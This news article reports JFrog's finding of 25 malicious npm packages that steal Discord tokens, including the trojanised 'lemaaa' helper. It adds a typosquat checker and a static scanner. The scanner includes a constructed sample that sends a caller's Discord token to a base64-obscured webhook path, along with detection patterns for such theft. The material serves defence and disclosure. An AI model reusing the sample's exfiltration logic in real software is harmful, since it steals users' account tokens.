Posted on February 23, 2022 at 7:13 PM
JFrog security researchers said they discovered 25 malicious Node Package Manager (npm) packages that steal Discord tokens, among other malicious behaviour.
Two researchers at the security firm, Shachar Menashe and Andrey Polkovnychenko, disclosed this in a recent report.
A stolen token lets an attacker act as the victim without knowing the password: it can be used to plant malware through the victim's account, to hijack Discord servers the victim administers, or simply to be sold on underground criminal markets.
The security team also said it continuously monitors major open-source software (OSS) repositories with automated tooling to catch supply chain threats early. Several findings have already been reported to the relevant vendors so that fixes can ship before attackers exploit them.
The Security Firm Discovered The Packages Using Its Scanning Tools
The malicious packages were identified by JFrog's automated scanning tools, and all of the reported packages have since been removed by the npm maintainers. The researchers nonetheless warn organisations to stay alert, because other malicious packages may still be present and evading detection.
The researchers also noted that some malicious npm packages still masquerade as the popular colors.js package, which was at the centre of a denial-of-service incident in January when a sabotaged release introduced an infinite loop in every application that depended on it. The masquerade remains effective because colors.js is still one of the most downloaded packages on npm.
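Masquerading as colors.js works because a lookalike name (an extra letter, a swapped separator, a version number glued onto the name) passes a quick visual check. The following is an added example, not JFrog's tooling and not from the article: a small typosquat check over a package.json dependency map. The allow-list of popular names and the sample package.json are constructed for the demonstration; a real check would draw the allow-list from download-count data.

```javascript
// Added example, not JFrog's tooling: a typosquat check over a package.json
// dependency map. Every name is compared with a small allow-list of popular
// packages (constructed here; a real check would use download-count data) and
// near-misses are reported for human review.

const POPULAR = ['colors', 'chalk', 'lodash', 'express', 'discord.js', 'axios'];

// Constructed sample package.json: one exact match, three lookalikes and one
// unrelated dependency.
const SAMPLE_PACKAGE_JSON = {
  dependencies: {
    'chalk': '^4.1.2',      // exact popular name, not flagged
    'colors-3.0': '1.0.0',  // version-like suffix glued onto "colors"
    'colorss': '1.0.0',     // one extra letter
    'discord-js': '1.0.0',  // separator swapped in "discord.js"
    'left-pad': '1.3.0',    // unrelated name, must not be flagged
  },
};

// Optimal-string-alignment distance: insertions, deletions, substitutions and
// adjacent transpositions each cost 1, so "lodsah" is one edit from "lodash".
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Reduce a name to what a reader skims: drop the scope, lowercase, strip a
// trailing version-like suffix ("-3.0", "2") and all separators.
function normalise(name) {
  return name
    .replace(/^@[^/]+\//, '')
    .toLowerCase()
    .replace(/[-_.]?\d+(\.\d+)*$/, '')
    .replace(/[-_.]/g, '');
}

// Returns one finding per dependency whose normalised name is within a small
// edit distance of a popular package without being that package.
function findTyposquats(dependencies, popular = POPULAR) {
  const exact = new Set(popular);
  const findings = [];
  for (const dep of Object.keys(dependencies)) {
    if (exact.has(dep)) continue; // the real thing, nothing to report
    const n = normalise(dep);
    for (const p of popular) {
      const np = normalise(p);
      const distance = editDistance(n, np);
      const threshold = np.length >= 8 ? 2 : 1; // longer names tolerate two edits
      if (distance <= threshold) {
        findings.push({ dependency: dep, lookalikeOf: p, distance });
        break;
      }
    }
  }
  return findings;
}

console.log(findTyposquats(SAMPLE_PACKAGE_JSON.dependencies));
```

The output is a list of candidates, not a verdict: legitimate packages can sit one edit away from a popular name (the real `color` package is one edit from `colors`), so each hit still needs a look at the publisher, the publish date and the download count before it is blocked.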
The Threat Actors Are Targeting Other Malware Authors
JFrog also found malware operators targeting their fellow malware operators.
One package the scanner uncovered, dubbed “lemaaa”, is a library used by malware authors to manipulate Discord accounts.
When used in a particular way, however, the library hijacks the secret Discord token passed to it, in addition to carrying out the functions it advertises.
The researchers also found other kinds of packages, including environment variable stealers and remote code injectors.
The Lemaaa package stayed on JFrog's radar even after the other packages had been detected and removed by the npm maintainers, because it is a library that malware authors themselves use to manipulate Discord accounts.
The Lemaaa Package Has Several Unique Functions
Lemaaa has features that make it attractive to threat actors: given a Discord token, it can check and monitor passwords, steal billing information, grab backup codes, and remove friends from the victim's list.
JFrog describes Lemaaa as a helper module for novice Discord malware authors: it bundles common functions that, once supplied with a victim's Discord token, can be reused to take over the account or pull the victim's credit card information.
When the researchers dug into Lemaaa, they found that it had been trojanised: the secret Discord tokens supplied to the library are also sent to the library's developer for further use.
This type of attack is likely to grow over time, given that the npm registry is used by millions of developers worldwide.
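The pattern described above, a helper that legitimately sends the caller's token to the Discord API while also shipping it somewhere else, leaves static traces: a second outbound destination, a webhook path, and often a base64-wrapped string hiding that path. The following is an added example, not JFrog's scanner and not the code of lemaaa or any other package named in the article: a heuristic triage of a package's JavaScript source for that combination. SAMPLE_SOURCE is constructed to mimic the described behaviour; the webhook path, the base64 literal and the indicator list are all assumptions for the demonstration.

```javascript
// Added example, not JFrog's scanner: heuristic static triage of package
// source for the "trojanised Discord helper" pattern. SAMPLE_SOURCE below is a
// constructed stand-in for such a helper, not code from any real package.
const SAMPLE_SOURCE = `
const https = require('https');
// Advertised feature: look up the caller's profile with the token they supply.
function getProfile(token, cb) {
  https.get({ host: 'discord.com', path: '/api/v9/users/@me',
              headers: { Authorization: token } }, cb);
}
// Hidden behaviour: the same token is posted to a webhook the author controls.
function report(token) {
  const req = https.request({ host: 'discord.com', method: 'POST',
    path: Buffer.from('L2FwaS93ZWJob29rcy8xMjMvYWJj', 'base64').toString() });
  req.end(JSON.stringify({ content: token }));
}
module.exports = { getProfile: (t, cb) => { report(t); return getProfile(t, cb); } };
`;

// Quoted literals long enough to be worth decoding as base64 (constructed threshold).
const BASE64_LITERAL = /['"]([A-Za-z0-9+/]{16,}={0,2})['"]/g;

// Each indicator is benign on its own; the verdict depends on the combination.
const INDICATORS = [
  { name: 'discord-webhook',  re: /\/api\/webhooks\//i },
  { name: 'base64-decode',    re: /Buffer\.from\([^)]*['"]base64['"]\s*\)|\batob\s*\(/ },
  { name: 'outbound-request', re: /\b(https?\.(request|get)|fetch|axios\.(post|get|request))\s*\(/ },
  { name: 'token-in-header',  re: /Authorization\s*:[^,}\n]*token/i },
];

// Decode base64-looking literals on a line and keep only printable results,
// so a hidden "/api/webhooks/..." path is scanned like plain text.
function decodeBase64Literals(line) {
  const decoded = [];
  for (const m of line.matchAll(BASE64_LITERAL)) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(text)) decoded.push(text);
  }
  return decoded;
}

// Scan every line (and every decoded literal on it) against the indicators and
// combine the hits into a coarse verdict.
function triageSource(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    const views = [{ text: line, decoded: false }];
    for (const d of decodeBase64Literals(line)) views.push({ text: d, decoded: true });
    for (const v of views) {
      for (const ind of INDICATORS) {
        if (ind.re.test(v.text)) {
          findings.push({ line: idx + 1, indicator: ind.name, decoded: v.decoded,
                          evidence: v.text.trim().slice(0, 80) });
        }
      }
    }
  });
  const seen = new Set(findings.map(f => f.indicator));
  let verdict = 'no indicators';
  if (seen.has('discord-webhook') && seen.has('token-in-header')) {
    verdict = 'likely token exfiltration';   // token handling plus a webhook sink
  } else if (seen.has('outbound-request')) {
    verdict = 'review outbound destinations';
  }
  return { findings, verdict };
}

console.log(triageSource(SAMPLE_SOURCE));
```

Run this over the files of the package tarball (the output of `npm pack`) before it is installed rather than over node_modules, so that install scripts never execute. The indicators are deliberately weak on their own: a genuine Discord helper also sets an Authorization header and calls https.request, so only the combination is reported, and a package that builds its URLs from split strings or a custom encoding will slip past a regex scan of this kind.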
More Packages Could Be Discovered In The Future
The researchers also noted that tens of new malicious packages appear regularly and that their scanner discovers more every day, so the threat posed by malicious packages will likely continue.
JFrog had already reported 17 malicious npm packages in December. According to the firm, those packages were built to steal Discord tokens and other account credentials, enabling threat actors to hijack Discord servers.
Package names reported include water-template, wafer-text, wafer-template, tools-for-discord, mynewpkg, adv-discord-utility, crypto-standards, connectback.shell, markedjs, and lemaaa; the malicious behaviours observed range from typosquatting and Discord token stealing to environment variable stealing and hidden functionality. The researchers added that the scanner is likely to pick up more malicious packages in the future.